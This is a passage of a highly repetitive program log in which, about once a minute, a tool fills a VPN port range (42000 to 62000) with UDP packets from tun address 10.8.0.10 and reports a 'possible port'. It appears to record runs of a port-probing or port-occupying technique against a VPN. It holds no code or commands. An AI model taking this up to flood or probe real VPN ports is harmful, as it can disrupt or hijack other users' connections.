from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:38:04 -Starting port fill at 2020-09-06 12:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:39:06 -Starting port fill at 2020-09-06 12:40:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:40:05 -Starting port fill at 2020-09-06 12:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:41:07 -Starting port fill at 2020-09-06 12:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:42:05 -Starting port fill at 2020-09-06 12:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:43:05 -Starting port fill at 2020-09-06 12:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:44:07 -Starting port fill at 2020-09-06 12:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:45:07 -Starting port fill at 2020-09-06 12:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:46:04 -Starting port fill at 2020-09-06 12:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:47:06 -Starting port fill at 2020-09-06 12:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:48:04 -Starting port fill at 2020-09-06 12:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:49:04 -Starting port fill at 2020-09-06 12:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:50:04 -Starting port fill at 2020-09-06 12:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:51:06 -Starting port fill at 2020-09-06 12:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:52:05 -Starting port fill at 2020-09-06 12:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:53:04 -Starting port fill at 2020-09-06 12:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:54:06 -Starting port fill at 2020-09-06 12:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:55:07 -Starting port fill at 2020-09-06 12:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:56:07 -Starting port fill at 2020-09-06 12:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:57:07 -Starting port fill at 2020-09-06 12:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:58:06 -Starting port fill at 2020-09-06 12:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:59:05 -Starting port fill at 2020-09-06 13:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:00:05 -Starting port fill at 2020-09-06 13:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 13:01:07 -Starting port fill at 2020-09-06 13:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 13:02:07 -Starting port fill at 2020-09-06 13:03:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:03:05 -Starting port fill at 2020-09-06 13:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 13:04:06 -Starting port fill at 2020-09-06 13:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:05:06 -Starting port fill at 2020-09-06 13:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:06:04 -Starting port fill at 2020-09-06 13:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:07:05 -Starting port fill at 2020-09-06 13:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:08:06 -Starting port fill at 2020-09-06 13:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w 